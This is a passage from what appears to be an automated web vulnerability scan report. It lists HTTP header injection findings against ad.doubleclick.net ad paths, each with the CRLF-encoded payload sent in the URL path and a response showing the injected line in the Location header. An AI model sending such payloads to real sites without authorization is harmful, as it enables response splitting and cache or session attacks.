GET /1321c%0d%0a3e041b3a832/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1321c
3e041b3a832
/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http: //a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418
Date: Mon, 14 Feb 2011 03:01:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72502%0d%0a12671d1359d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72502%0d%0a12671d1359d/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/198323728.198101735/289800150/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/289800150/direct;wi.728;hi.90/01/3134178?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72502
12671d1359d
/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971:
Date: Mon, 14 Feb 2011 01:52:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5367.3630.247REALMEDIAINC.1/B4475978.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8504a%0d%0adf688c05841 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8504a%0d%0adf688c05841/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670?;ord=669427212? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8504a
df688c05841
/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670
Date: Mon, 14 Feb 2011 02:47:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18c9f%0d%0a0be64f77a4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18c9f%0d%0a0be64f77a4b/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18c9f
0be64f77a4b
/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027;:
Date: Mon, 14 Feb 2011 01:36:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 676f7%0d%0a0fa438a5db8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /676f7%0d%0a0fa438a5db8/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/676f7
0fa438a5db8
/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;:
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8da73%0d%0ae56ac07066f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8da73%0d%0ae56ac07066f/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8da73
e56ac07066f
/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797
Date: Mon, 14 Feb 2011 02:10:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 353a8%0d%0a75a8fe84543 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /353a8%0d%0a75a8fe84543/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/353a8
75a8fe84543
/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303
Date: Mon, 14 Feb 2011 02:49:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a3a9%0d%0ae709d62e175 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a3a9%0d%0ae709d62e175/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a3a9
e709d62e175
/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998
Date: Mon, 14 Feb 2011 02:34:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 41285%0d%0a1e6e4985043 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /41285%0d%0a1e6e4985043/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/41285
1e6e4985043
/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000
Date: Mon, 14 Feb 2011 02:40:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4233.RSI/B4932906.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b8f1%0d%0a4fde4d2ea46 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b8f1%0d%0a4fde4d2ea46/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http://ad.yieldmanager.com/clk?2,13%3B347c1d6bae030f8b%3B12e21cf7f71,0%3B%3B%3B2909974716,tgEAALdCCQAMv2oAAAAAACJcHgAAAAAAAgAAAAYAAAAAAP8AAAABFJxwDgAAAAAAUgYoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAopAQAAAAAAAIAAgAAAAAAZH.PIS4BAAAAAAAAAGNjZTE4Yzc2LTM3ZGEtMTFlMC05MDYyLTAwMzA0OGQ0NDg0MABwAAAAAAA=,,http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F,;ord=1297647370? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b8f1
4fde4d2ea46
/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http: //ad.yieldmanager.com/clk
Date: Mon, 14 Feb 2011 01:38:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4dc34%0d%0aa5e50b6234 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4dc34%0d%0aa5e50b6234/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4dc34
a5e50b6234
/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http: //media.fastclick.net/w/click.here
Date: Mon, 14 Feb 2011 01:44:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 21598%0d%0adfea6d161cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /21598%0d%0adfea6d161cc/N5506.aol1/B5070033.19;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494%5E961998%5E65%5E0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64?trg=;ord=4634560753? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/21598
dfea6d161cc
/N5506.aol1/B5070033.19;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494^961998^65^0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64
Date: Mon, 14 Feb 2011 01:26:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6f51e%0d%0a50897e369b1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6f51e%0d%0a50897e369b1/N5506.aol1/B5070033.20;sz=468x60;click=http://r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416%5E955496%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64?trg=;ord=5663037085? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6f51e
50897e369b1
/N5506.aol1/B5070033.20;sz=468x60;click=http: //r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416^955496^1183^0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64
Date: Mon, 14 Feb 2011 01:37:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4200e%0d%0a6f9caf0b583 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4200e%0d%0a6f9caf0b583/N5506.aol1/B5070033.21;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492%5E955494%5E65%5E0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64?trg=;ord=6836118676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4200e
6f9caf0b583
/N5506.aol1/B5070033.21;sz=160x600;click=http: //r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492^955494^65^0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64
